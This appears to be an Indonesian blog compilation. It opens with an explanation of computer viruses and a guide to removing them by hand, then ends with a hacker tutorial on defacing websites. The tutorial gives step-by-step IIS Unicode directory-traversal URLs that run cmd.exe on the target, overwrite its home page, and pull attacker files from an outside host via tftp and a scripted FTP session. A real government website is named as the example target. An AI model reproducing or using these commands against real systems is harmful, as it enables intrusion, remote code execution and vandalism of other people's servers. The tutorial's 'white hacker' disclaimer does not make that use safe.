Virus komputer bisa diartikan sebagai suatu program komputer biasa. Tetapi memiliki perbedaan yang mendasar dengan program-program lainnya,yaitu virus dibuat untuk menulari program-program lainnya, mengubah, memanipulasinya bahkan sampai merusaknya. Ada yang perlu dicatat disini, virus hanya akan menulari apabila program pemicu atau program yang telah terinfeksi tadi dieksekusi, disinilah perbedaannya dengan "worm". Tulisan ini tidak akan bahas worm karena nanti akan mengalihkan kita dari pembahasan mengenai virus ini.

KRITERIA VIRUS
Suatu program dapat disebut sebagai suatu virus apabila memenuhi minimal 5 kriteria berikut :
1. Kemampuan untuk mendapatkan informasi
2. Kemampuan untuk memeriksa suatu file
3. Kemampuan untuk menggandakan diri dan menularkan diri
4. Kemampuan melakukan manipulasi
5. Kemampuan untuk menyembunyikan diri.
Sekarang akan coba dijelaskan dengan singkat apa yang dimaksud dari tiap-tiap kemampuan itu dan mengapa ini sangat diperlukan.

1. Kemampuan untuk mendapatkan informasi
Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada dalam suatu directory. Untuk apa? Agar dia dapat memperoleh daftar file yang bisa dia tulari. Misalnya, virus makro yang akan menginfeksi semua file data MS Word, akan mencari daftar file berekstensi *.doc. Disinilah kemampuan mengumpulkan informasi itu diperlukan agar virus dapat membuat daftar/data semua file, lalu memilahnya dengan mencari file-file yang bisa ditulari. Biasanya data ini tercipta saat file yang tertular/terinfeksi virus atau file program virus itu sendiri dibuka oleh user. Sang virus akan segera melakukan pengumpulan data dan menaruhnya (biasanya) di RAM, sehingga apabila komputer dimatikan semua data hilang. Tetapi data-data ini akan tercipta kembali setiap kali virus itu diaktifkan. Biasanya data-data ini disimpan juga sebagai hidden file oleh virus tersebut.

2. Kemampuan memeriksa suatu program
Suatu virus juga harus bisa memeriksa suatu file yang akan ditulari, misalnya dia bertugas menulari program berekstensi *.doc, maka dia harus memeriksa apakah file dokumen tersebut telah terinfeksi ataupun belum, karena jika sudah, akan percuma menularinya lagi. Ini sangat berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan menginfeksi suatu file/program. Yang umum dilakukan oleh virus adalah memiliki/memberi tanda pada file/program yang telah terinfeksi sehingga mudah untuk dikenali oleh virus tersebut. Contoh penandaan adalah misalnya memberikan suatu byte yang unik di setiap file yang telah terinfeksi.

3. Kemampuan untuk menggandakan diri
Kalo ini memang virus "bang-get", maksudnya, tanpa kemampuan ini tak adalah virus. Inti dari virus adalah kemampuan mengandakan diri dengan cara menulari file lainnya. Suatu virus apabila telah menemukan calon korbannya maka ia akan mengenalinya dengan memeriksanya. Jika belum terinfeksi maka sang virus akan memulai aksinya penularan dengan cara menuliskan byte pengenal pada file tersebut, dan seterusnya mengcopikan/menulis kode objek virus diatas file sasaran. Beberapa cara umum yang dilakukan oleh virus untuk menulari/menggandakan dirinya adalah :
a. File yang akan ditulari dihapus atau diubah namanya. Kemudian diciptakan suatu file berisi program virus itu sendiri menggunakan nama file yang asli.
b. Program virus yang sudah dieksekusi/load ke memori akan langsung menulari file-file lain dengan cara menumpangi seluruh file yang ada.

4. Kemampuan mengadakan manipulasi
Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus menulari suatu file. Isi dari suatu rutin ini dapat beragam mulai dari yang tidak berbahaya sampai yang melakukan perusakan. Rutin ini umumnya digunakan untuk memanipulasi file atau pun mempopulerkan pembuatnya ! Rutin ini memanfaatkan kemampuan dari suatu sistem operasi (Operating System), sehingga memiliki kemampuan yang sama dengan yang dimiliki sistem operasi. Misal :
a. Membuat gambar atau pesan pada monitor
b. Mengganti/mengubah-ubah label dari tiap file, direktori, atau label dari drive di PC
c. Memanipulasi file yang ditulari
d. Merusak file
e. Mengacaukan kerja printer, dsb

5. Kemampuan Menyembunyikan diri
Kemampuan menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua pekerjaan baik dari awal sampai berhasilnya penularan dapat terlaksana.
Langkah langkah yang biasa dilakukan adalah:
- Program virus disimpan dalam bentuk kode mesin dan digabung dengan program lain yang dianggap berguna oleh pemakai
- Program virus diletakkan pada Boot Record atau track pada disk yang jarang diperhatikan oleh komputer itu sendiri
- Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak terlalu berubah ukurannya
- Virus tidak mengubah keterangan/informasi waktu suatu file
SIKLUS HIDUP VIRUS
Siklus hidup virus secara umum, melalui 4 tahap:
o Dormant phase ( Fase Istirahat/Tidur )
Pada fase ini virus tidaklah aktif. Virus akan diaktifkan oleh suatu kondisi tertentu, semisal: tanggal yang ditentukan, kehadiran program lain/dieksekusinya program lain, dsb. Tidak semua virus melalui fase ini.
o Propagation phase ( Fase Penyebaran )
Pada fase ini virus akan mengkopikan dirinya kepada suatu program atau ke suatu tempat dari media storage (baik hardisk, RAM dsb). Setiap program yang terinfeksi akan menjadi hasil “kloning” virus tersebut (tergantung cara virus tersebut menginfeksinya).
o Trigerring phase ( Fase Aktif )
Di fase ini virus tersebut akan aktif dan hal ini juga di picu oleh beberapa kondisi seperti pada Dormant Phase.
o Execution phase ( Fase Eksekusi )
Pada fase inilah virus yang telah aktif tadi akan melakukan fungsinya. Seperti menghapus file, menampilkan pesan-pesan, dsb

JENIS – JENIS VIRUS
Untuk lebih mempertajam pengetahuan kita tentang virus, saya akan coba memberikan penjelasan tentang jenis-jenis virus yang sering berkeliaran di masyarakat umum.
1. Virus Makro
Jenis virus ini pasti sudah sangat sering kita dengar. Virus ini ditulis dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila aplikasi pembentuknya dapat berjalan dengan baik. Sebagai contoh jika pada komputer mac dijalankan aplikasi Word, maka virus makro yang dibuat dari bahasa makro Word dapat bekerja pada komputer bersistem operasi Mac ini.
Contoh virus:
- Varian W97M, misal W97M.Panther
Panjang 1234 bytes, akan menginfeksi NORMAL.DOT dan menginfeksi dokumen apabila dibuka.
- WM.Twno.A;TW
Panjang 41984 bytes, akan menginfeksi Dokumen Ms.Word yang menggunakan bahasa makro, biasanya berekstensi *.DOT dan *.DOC
- dll
2. Virus Boot Sector
Virus Boot sector ini sudah umum sekali menyebar. Virus ini dalam menggandakan dirinya, akan memindahkan atau menggantikan boot sector asli dengan program booting virus. Sehingga saat terjadi booting maka virus akan diload ke memori dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar (contoh : monitor, printer dsb) dan dari memori ini pula virus akan menyebar ke seluruh drive yang ada dan yang terhubung ke komputer (contoh : floopy, drive lain selain drive c:).
Contoh virus :
- Varian virus wyx
ex: wyx.C(B) menginfeksi boot record dan floopy ;
Panjang :520 bytes;
Karakteristik : memory resident dan terenkripsi.
- Varian V-sign :
Menginfeksi : Master Boot Record ;
Panjang 520 bytes;
Karakteristik : menetap di memori (memory resident),terenkripsi, dan polymorphic)
- Stoned.june 4th/ bloody!:
Menginfeksi : Master Boot Record dan floopy;
Panjang 520 bytes;
Karakteristik : menetap di memori (memory resident), terenkripsi dan menampilkan pesan "Bloody!june 4th 1989" setelah komputer melakukan booting sebanyak 128 kali.
3. Stealth Virus
Virus ini akan menguasai tabel interrupt pada DOS yang sering kita kenal dengan "Interrupt interceptor". Virus ini berkemampuan untuk mengendalikan instruksi-instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya baik secara penuh ataupun ukurannya.
Contoh virus :
- Yankee.XPEH.4928,
Menginfeksi file *.COM dan *.EXE ;
Panjang 4298 bytes;
Karakteristik: menetap di memori, ukuran tersembunyi, memiliki pemicu
- WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth dimasukkan pula disini), Menginfeksi floopy dan motherboot record;
Panjang 520 bytes;
Karakteristik : menetap di memori; ukuran dan virus tersembunyi.
- Vmem(s):
Menginfeksi file file *.EXE, *.SYS, dan *.COM ;
Panjang fie 3275 bytes;
Karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi.
- dll

4. Polymorphic Virus
Virus ini Dirancang buat mengecoh program antivirus, artinya virus ini selalu berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah strukturnya setiap kali selesai menginfeksi file/program lain.
Contoh virus:
- Necropolis A/B,
Menginfeksi file *.EXE dan *.COM;
Panjang file 1963 bytes;
Karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan dapat berubah ubah struktur
- Nightfall,
Menginfeksi file *.EXE;
Panjang file 4554 bytes;
Karakteristik : menetap di memori, ukuran dan virus tesembunyi,memiliki pemicu, terenkripsi dan dapat berubah-ubah struktur
- dll
5. Virus File/Program
Virus ini menginfeksi file-file yang dapat dieksekusi langsung dari sistem operasi, baik itu file *.EXE, maupun *.COM biasanya juga hasil infeksi dari virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya.
6. Multi Partition Virus
Virus ini merupakan gabungan dari virus boot sector dan virus file. Artinya pekerjaan yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file-file *.EXE atau *.COM dan juga menginfeksi boot sector.

BEBERAPA CARA PENYEBARAN VIRUS
Virus layaknya virus biologi harus memiliki media untuk dapat menyebar, virus komputer dapat menyebar ke berbagai komputer/mesin lainnya juga melalui berbagai media, diantaranya:
1. Disket, media storage R/W
Media penyimpanan eksternal dapat menjadi sasaran empuk bagi virus untuk dijadikan media. Baik sebagai tempat menetap ataupun sebagai media penyebarannya. Media yang bias melakukan operasi R/W (Read dan Write) sangat memungkinkan untuk ditumpangi virus dan dijadikan sebagai media penyebaran.
2. Jaringan ( LAN, WAN,dsb)
Hubungan antara beberapa computer secara langsung sangat memungkinkan suatu virus ikut berpindah saat terjadi pertukaran/pengeksekusian file yang mengandung virus.

3. WWW (internet)
Sangat mungkin suatu situs sengaja ditanamkan suatu “virus” yang akan menginfeksi komputer-komputer yang mengaksesnya.
4. Software yang Freeware, Shareware atau bahkan Bajakan
Banyak sekali virus yang sengaja ditanamkan dalam suatu program yang disebarluaskan baik secara gratis, atau trial version.
5. Attachment pada email, transfering file
Hampir semua jenis penyebaran virus akhir-akhir ini menggunakan email attachment dikarenakan semua pemakai jasa internet pastilah menggunakan email untuk berkomunikasi, file-file ini sengaja dibuat mencolok/menarik perhatian, bahkan seringkali memiliki ekstensi ganda pada penamaan filenya.

PENANGGULANGANNYA
1. Langkah-Langkah untuk Pencegahan
Untuk pencegahan anda dapat melakukan beberapa langkah-langkah berikut :
o Gunakan antivirus yang anda percayai dengan update terbaru. Tidak perduli apapun merknya asalkan selalu diupdate, dan auto-protect dinyalakan maka komputer anda terlindungi.
o Selalu scanning semua media penyimpanan eksternal yang akan digunakan, mungkin hal ini agak merepotkan tetapi jika auto-protect antivirus anda bekerja maka prosedur ini dapat dilewatkan.
o Jika anda terhubung langsung ke Internet cobalah untuk mengkombinasikan antivirus anda dengan Firewall, Anti-spamming, dsb.
o Selalu waspada terhadap fle-file yang mencurigakan, contoh : file dengan 2 buah exstension atau file executable yang terlihat mencurigakan.
o Untuk software freeware + shareware, ada baiknya anda mengambilnya dari situs resminya.
o Semampunya hindari membeli barang bajakan, gunakan software-software open source.
2. Langkah-Langkah Apabila telah Terinfeksi
o Deteksi dan tentukan dimanakah kira-kira sumber virus tersebut apakah di disket, jaringan, email dsb. Jika anda terhubung ke jaringan maka ada baiknya anda mengisolasi komputer anda dulu (baik dengan melepas kabel atau mendisable sambungan internet dari control panel)
o Identifikasi dan klasifikasikan jenis virus apa yang menyerang pc anda, dengan cara:
􀂃Gejala yang timbul, misal : pesan, file yang corrupt atau hilang dsb
􀂃Scan dengan antivirus anda, jika anda terkena saat auto-protect berjalan berarti virus definition di dalam komputer anda tidak memiliki data virus ini, cobalah update secara manual atau mendownload virus definitionnya untuk kemudian anda install. Jika virus tersebut memblok usaha anda untuk mengupdate, maka upayakan untuk menggunakan media lain (komputer) dengan antivirus yang memiliki update terbaru.
o Bersihkan virus tersebut. Setelah anda berhasil mendeteksi dan mengenalinya maka usahakan segera untuk mencari removal atau cara-cara untuk memusnahkannya di situs-situs yang memberikan informasi perkembangan virus tersebut. Hal ini perlu dilakukan apabila antivirus dengan update terbaru anda tidak berhasil memusnahkannya.
o Langkah terburuk. Jika semua hal diatas tidak berhasil adalah memformat ulang komputer anda .

PENUTUP
Semoga pembahasan mengenai virus ini dapat memberikan manfaat khususnya bagi kita semua. Tulisan ini ditujukan untuk pembelajaran semata sehingga sangat diharapkan kritik dan sarannya. Apabila banyak kekurangan pada tulisan ini harap dimaklumi. Terakhir, penulis merasa perlu untuk mengucapkan terima kasih kepada *puji, echostaff (MOBY, the_day, z3r0byt3, comex,), newbie_hacker members, dan semua pencinta Opensource.

MEMBASMI VIRUS SECARA MANUAL

2008-12-28T16:50:00.000+07:00

Membasmi Virus, Trojan & Spyware Secara Manual
________________________________________
Threads ini ditujukan untuk membasmi virus-virus baru dan virus Indo yang tidak terdeteksi oleh antivirus yang dipakai pada komputer. Dan juga buat yang bete kalau harus scan komputer cari virus berjam-jam padahal dengan cara ini paling 10 menit beres. Semoga bisa berguna dan bermanfaat.

Bagi netter yang komputernya suka terkena virus, mungkin panduan berikut di bawah ini bisa berguna. Secara teori cara ini bisa membunuh 90% yang beredar, hanya virus macro (word, excel) dan virus yang merusak file (extension EXE) yang susah dibersihkan dengan cara ini, walau bisa dicegah penularannya.

Membasmi Virus Dengan Command Windows

Bila netter merasakan komputer terkena virus, trojan dan spyware (dalam hal ini kita kategorikan semuanya sebagai virus aja), yang biasanya dengan indikasi ada tampilan yang tidak biasanya pada desktop, program yang digunakan dan browser. Sebaiknya langsung menempuh langkah berikut ini:

1. Tahap Pertama, Matikan Virus di Memori

Tekan Ctrl + Alt + Del untuk menampilan Windows Task Manager - Lalu ke bagian "Processes", terus klik bagian "User Name" untuk mengurutkan file yang diproses pada memori. Setelah itu, lihat ada bagian yang mencurigakan atau tidak. Bila banyak yang di-loading pada memori, sebaiknya dimatikan dahulu startup yang otomatis ter-loading pada bagian bawah kanan (ikon speaker dan jam). Matikan semua ikon-ikon tersebut dengan cara "quit" atau "exit" dari programnya.

Loading virus ke memori biasanya berupa EXE file. Langkah ini untuk mencegah virus untuk menyebar terlebih dahulu lewat memori kita. Matikan semua file EXE yang loading di memori kita yang sudah kita urutkan sebelumnya berdasarkan "User Name". Jangan mematikan file yang kategori "System", "Local Service", dan "Network Service", karena bisa membuat sistem kita Hang atau Freeze.

2. Tahap Kedua, Non-aktifkan Virus di Startup
Untuk menon-aktifkan virus supaya tidak terloading ke memori, kita harus membuangnya di startup. Caranya kita bisa menggunakan perintah MSCONFIG, klik menu Start>Run>msconfig - setelah itu akan tampil "System Configuration Utility". Lalu pilihlah "Startup", dalam kasus ini sebaiknya netter yang tidak mengerti mana yang loading virus mana yang bukan, sebaiknya pilih "Disable All". Nantinya netter baru aktifkan kembali startup yang diinginkan kalau virus sudah bersih.

Bila netter yang mengerti file yang loading mana file yang diperlukan, dan mana yang tidak, atau mana yang virus atau bukan, sebaiknya menbuang conteng (check box) pada kotak bagian kiri untuk yang dicurigai sebagai virus. Cara ini akan menonaktifkan virus di startup kita.

3. Tahap Ketiga, Hapus File Virus dari Komputer
Carilah dengan menggunakan fasilitas "search" pada WIndows, klik menu Start>Search, lalu carilah file EXE virus (contoh: Happy.exe) yang sebelumnya loading di memori atau startup. File ini biasanya disimpan oleh pembuatnya di bagian folder Windows atau System32 dari WIndows. Setelah ditemukan, delete atau hapus file tersebut.

4. Tahap Keempat, Hapus Virus dari System Registry
Tahap ini adalah tahap terakhir. Kita harus menggunakan perintah REGEDIT untuk mengubah dan men-delete virus dari registry kita. Pilihlah Start>Run>regedit - lalu ke menu "Edit" pilihlah "Find" (atau tekan Ctrl+F). Masukkan nama file virus yang ingin kita hapus (contoh: Happy.exe), lalu pilih "Find Next". Apabila ditemukan file virus, hapuslah semua registry yang memuat virus tersebut (berikut dengan foldernya kalau ada).

Kemudian lanjutkan dengan menekan tombol "F3" atau di menu pilih "Edit" terus "Find Next". Biasanya file virus diletakkan pada beberapa tempat di registry. Jadi pastikan netter menghapus semuanya sampai bersih, dalam arti registry komputer bebas dari loading virus tersebut. Karena kalau tidak pekerjaan ini akan sia-sia.
Membasmi Virus Dengan Bantuan Program Lain

Ada beberapa tools yang sangat berguna bagi netter untuk mempermudah pembasmian virus, antara lain:

CProcess - Tools ini fungsinya seperti "Windows Task Manager" (Ctrl + Alt +Del). Tools ini sangat bagus sekali untuk mengenali mana yang virus atau bukan karena mengandung informasi detil mengenai file yang terloading di memori. Seperti contoh file yang benar (bukan virus) selalu tertulis nama perusahaan pembuatnya (contoh: Windows buatan Microsoft Corp).

Hijack This - Tools yang sangat bagus sekali sebagai pengganti command MSCONFIG. Sering kali virus mematikan hak akses kita terhadap MSCONFIG supaya kita tidak bisa menghapus file virus yang ter-loading ketika Startup. Nah program ini berfungsi untuk menggantikan MSCONFIG yang tidak bisa aktif. Selain itu program ini bisa mendeteksi lebih mendetil seperti spyware yang inject di dalam browser kita (BHO), dan bisa menonaktifkannya..
CCleaner - Tools yang satu ini selain berguna untuk menggantikan command REGEDIT, juga bisa membersihkan virus di registry secara otomatis. Selain itu CCleaner juga bisa mempercepat akses Windows kamu dengan membersihkan semua sampah-sampah di dalam registry kamu.
PCMAV - Program antivirus buatan PC Media ini terbukti sangat ampuh untuk menghapus virus-virus Indo yang kadang-kadang suka rese.
AVG 8 Free Edition - Program antivirus gratis yang sangat powerful untuk mengatasi virus dari luar negeri.

DEFACE WEBSITE

2008-12-28T15:52:00.000+07:00

TUTORIAL HACKER
Tutorial Unicode By Jati/Gab ( Crew SMPN19 Bogor)Os Target Windows Nt /9xIni HendakNya Dijadikan Bahan Percobaan yang Bermanfaat YachTutorial ini diperoleh dari orang orang yang aktif di irc.dal.net chanel: #MinangCrew, #K-elektronik,#Hackermuda, #Deface-team,
#Makassarhack, #Indohack #IndoCarding, #Cracxer,#Cacing,#CrackerLink, #MedanHacking,
#Aritechdev,#Neoteker ...etcINGAT JIKA KAMU MERASA MENJADI HACKER SEJATI JANGAN MERUSAK WEB ORANG
TAPI HANYA MEMPERINGATKAN SAJA SUPAYA SEKURITYNYA LEBIH BAIK LAGI.JANGAN LUPA SELALU MEMBECKUP WEB YANG KAMU HACK JADI KAMU BISA
MEMBANTU MEMBENARKANYA LAGI.KAMU BOLEH MERUSAK WEB JIKA WEB TERSEBUT BERBAU SARA, RAS, DAN PORNO
SERTA YANG SIFATNYA MENDORONG ORANG UNTUK ANARKIS/MENGHASUT
KEKERASANBE WHITE HACKER DON’T BE BLACK HACKER/CRACKERPEACE AND FREE1. Kita Harus menentukan WebSite Target/ Sasaran Kita : www.target.loe contoh-->>
www.polri.go.id
2. Login Ini Merupakan Directory yang Ada Di Web Site Tersebut Directory Ini Di Configurasi Dengan Script tertentu Supayafile dalam Web tersebut
Berhubungan Jika terjadi bug pada script nya maka kita bisa bembus web ini ada beberapa contoh login diantaranya : a)/_vti_bin b)/_vti_cnf c)/cgi-bin d)/scripts e)/msadc
3. Unicode --->> merupakan code yang dapat membaca script configurasi website tersebut code
ini yang dapat membaca bug cgi nya hasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita hackinng a) ..%c1%1c.. b) ..%c0%9v.. c) ..%c0%af.. d) ..%c0%qf.. e) ..%c1%8s.. f) ..%e0%80%af.. g) ..%c1%9c.. h) ..%c1%pc..
4. OS target -->>ini Menyatakan Sertificate Web Os kita WinNT dan Win98 0xB5 ISO 8859-1 0xC5 ISO 8859-1 0xEA CP437 0x2140 JIS X 0208 0x22 ISO 8859-1
5. Cara KerjaSecara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :A.) Deface WebSite Perintah Echo
a.)Secara umum : http://target/login/unicode/os/system/c+dir atau
http://www.polri.go.id/login/unicode/os/system/c+dir

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
contohnya -->>
Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah
menembus web site itu Maka Yang terlihat pada brower kita adalah list yang berupa isi hardisk webserver
tersebut sama halnya command dir yang kita lakukan di Dos Prompt Directory of c: 10/05/2001 19:56 Programs Files 10/05/2001 19:56 Inetpub 08/05/2001 10:23 230 cmd.exe 24/04/2001 04:33 4.620 1home.htm 05/10/2000 12:40 668 about.htm 10/05/2001 19:54 AboutUs 11/05/2001 10:28 131 about_us.htm 28/10/2000 14:49 4.911 about_us.old.htm
b.)Setelah berhasil liat List Hardisk Kita Harus cari Path_Translade web nya dengan
menggunakan command /c+dir+c: di ubah menjadi /c+set

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
menjadi
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+set /c+dir+c: di ubah menjadi /c+set
maka Akan keluar CGI error yang isinya menyatakan Configurasi Batch Sytem
WebServer tersebut Keluar Macam - Macam Yang Perlu dilihat cuma Path_Translade=d:wwwpolri
c.) Langkah Selanjutnya Adalah Copy file cmd.exe dengan nama baru cmd1.exe atau
nama anda contoh Jati.exe dengan mengganti
/c+dir+c: menjadi /c+copy+c:
lalu ditambahkan dengan : winntsystem32cmd.exe+c:jati.exe
sehingga kita dapatkan :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:win
ntsystem32cmd.exe+c:jati.exe
sekarang kamu bisa liat file cmd1.exe udah ada di direktori :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+dir+c: Tujuan Ini Sebenarnya untuk menyingkat command pada addres ie kita
d.)Cari halaman index ke www.target.com/blah.ida Kadang-kadang ekstensi .ida yang tidak diketahui akan merespon lokal path. Kalo trik .ida tidak bekerja, coba gunakan direktori InetPub :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+dir+c:inetpub
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+dir+c:inetpubwwwroot
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+dir+c:inetpubwwwrootindex.ht
m
sebenarnya langkah ini tidak perlu tapi untuk jaga -jaga kan ngak papa dengan langkah b.) tadi sebenarnya kita sudah tau dimana letah index.htm nya atau
dengan kata lain folder webnya
e.)kalau lo merasa dirinya hacker backup dulu halaman depan web nya, karena hacker
kerjanya bukan menghancurkan tapi memperingatkan hanya orang - orang amatiran atau katalain orang yang berjiwa vandalis yang kerja
merusak tanpa backup index.htm nya, jika tidak kita menulisnya dengan nama file baru dengan
cara :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+copy+c:inetpubwwwrootindex.
htm+c:inetpubwwwrootindex.htm.bak
f.) Baru Kita deface atau echo Halaman Depannya dengan command dibawah ini :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+echo+You%20Were%20Hack
ed+>+c:inetpubwwwrootindex.htm untuk tidak merusak web nya kita tulis dengan nama file baru
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+echo+You%20Were%20Hack
ed+>+c:inetpubwwwrootjati.htm
/c+echo+You%20Were%20Hacked+>+c: >>> adalah untuk menuliskan kata-kata You
Were Hacked pada
c:inetpubwwwrootindex.htm file yang ditulis atau c:inetpubwwwrootjati.htm file yang
ditulis
Untuk Anda yang telah Paham Bahasa Html Kalau pengen Hasil Defacenya keren
Gunakan command ini /c+echo"..::Web Site Has Been Hacking BY Jati:..Bgcolor%3dBlack Text%3dRed>This Web Site Hacking BY Text%3dred>....:::J.A.T.I:...
Thanks To Pepole On Irc.Dal.net
%23MinangCrew And %23Hackermuda
src%3D%22http://gaibsetan.f2g.net/hacking.jpg%22>"+>+c:inepubwwwrootindex.htm /c+echo"..::Web Site Has Been Hacking BY Jati:..Bgcolor%3dBlack Text%3dRed>This Web Site Hacking BY Text%3dred>....:::J.A.T.I:...
Thanks To Pepole On Irc.Dal.net
%23MinangCrew And %23Hackermuda
src%3D%22http://gaibsetan.f2g.net/hacking.jpg%22>"+>+c:inepubwwwrootjati.htm keterangan : %3d adalah pernyataan tanda = %22 adalah Pernyataan tanda " %23 adalah pernyataan tanda # Untuk Anda Yang Paham Html Anda Bisa NGapain aja Tuh Deface Web Anda. Biar
Bagus hack deface nya di input pakai Flash juga
g.) Langkah terkahir untuk liat hasilnya Membaca file yang lain dengan menggunakan
perintah 'type' :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+type+c:inetpubwwwrootindex.
htm
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+type+c:inetpubwwwrootjati.ht
m Atau liat Langsung aja http://www.polri.go.id/ atau www.polri.go.id/jati.htm
Jika dikau menemukan webserver ini dalam penulisannya accses denied ( penolakan penulisan )
Maka langkah kedua yaitu dengan cara tftp:
B.) Deface WebSite Dengan Cara tftp
Deface nya dilakukan dengan meng-upload file lewat TFTP32 Untuk Mendukung Tftp kita download dulu softwarenya http://www.download.com ketik
keyword nya TFTP32 Dikau Main Di Kompi diserver (sebab di user pasti takkan bisa). Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung
sajah. mari kita mulai meng-uploadnyah perintahnya sesuai langkah berikut ini :
a.)Kita Lakukan Langkah a.) (A.)pada deface dengan echo untuk mencari vulnernnya
atau bugcginya sehinggha kita mendapatkan holenya atau script nya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/ langkah selanjutnya yaitu uploadnya lagi. Namun Sebelumnya kita Dah siapkan File
htm/html halaman web defacenya ( berkreasi lah dikau disini ) Setelah semua siap baru upload dengan command
http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe
up-load)+ C:InetPubwwwrootmain.html
b.)Kita liat lagi apa yg terjadi di IE kita.
CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP
headers. The headers it did return are :
Waa..waaa .selamat dikau telah berhasil meng-upload file dikau memakai sofwer
TFTP32 tadee silahkan buka web site target tadi
Kekurangannyah dalam meng-upload file lewat TFTP32 terkadang suatu server (web
site) tidak mau menerima up-load file kita tadee .Jikalau itu terjadi maka gunakanlah cara pertama diatas tadee.
C.) Dengan Cara Ftp Dengan WebKita Yang Telah Kita Isi Dengan Bahan Deface Kita
Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan. di web itu
kita drop halaman web deface kita atau backdoor,virus atau program penghancur lainnya
selanjutnya kita lakukan Sama dengan Cara langkah a.)(A.) setelah dikau tau hole cgi
bugnya atau unicodennya maka dikau lakukan langkah berikut ini:
a.)Setelaha kita menemukan vulnernya http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c: Directory of c: 10/05/2001 19:56 Programs Files 10/05/2001 19:56 Inetpub 08/05/2001 10:23 230 cmd.exe 24/04/2001 04:33 4.620 1home.htm 05/10/2000 12:40 668 about.htm 10/05/2001 19:54 AboutUs 11/05/2001 10:28 131 about_us.htm 28/10/2000 14:49 4.911 about_us.old.htm
b.) Lalu kita lakukan langkah copy sesuai di langkah b.)(A.) ---->>tujuan nya memedekan
command unicode nya
c.) Lalu Kita Liat +set nya untuk melihat patch translade nya http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set
Kira Nya path nya di c:inetpubwwwroot
d.)Langkah Selanjutnya Yaitu kita membuat script ftp - http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:inetpubwwwrootjati.ftp - http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+echo+jati+>>+c:inetpubwwwrootjati.ftp - http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:inetpubwwwrootjati.ftp - http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjati.ftp - http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+echo+ascii+>>+c:inetpubwwwrootjati.ftp - http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+echo+get+jati.htm+>>+c:inetpubwwwrootjati.ftp - http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+echo+close+>>+c:inetpubwwwrootjati.ftp
Setelah Scrip jati.ftp selesai di liat lagi script nya apa benar http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+type+c:inetpubwwwrootjati.ftp
Setelah selesai script tuh kita jalan kan lagi script nya: http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+ftp+-s:c:inetpubwwwrootjati.ftp
buka ie satulagi untuk liat file nya dah smapai belum http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot Kalau dah terkirim selamat dah
Keterangan nya :Pada scrip jati.ftp itu kita muatkan hal ini sebenarnyaopen geocities.com --->>> scriptnya --->>
+echo+open+geocities.com+>>+c:inetpubwwwrootjati.ftpjati --->> user name --->>> scriptnya -->> +echo+jati+>>+c:inetpubwwwrootjati.ftpanuamakang --->>> password --->>> scriptnya -->>
+echo+anuamakang+>>+c:inetpubwwwrootjati.ftplcd c:inetpubwwwroot --->>> folder tujuan --->>> scriptnya
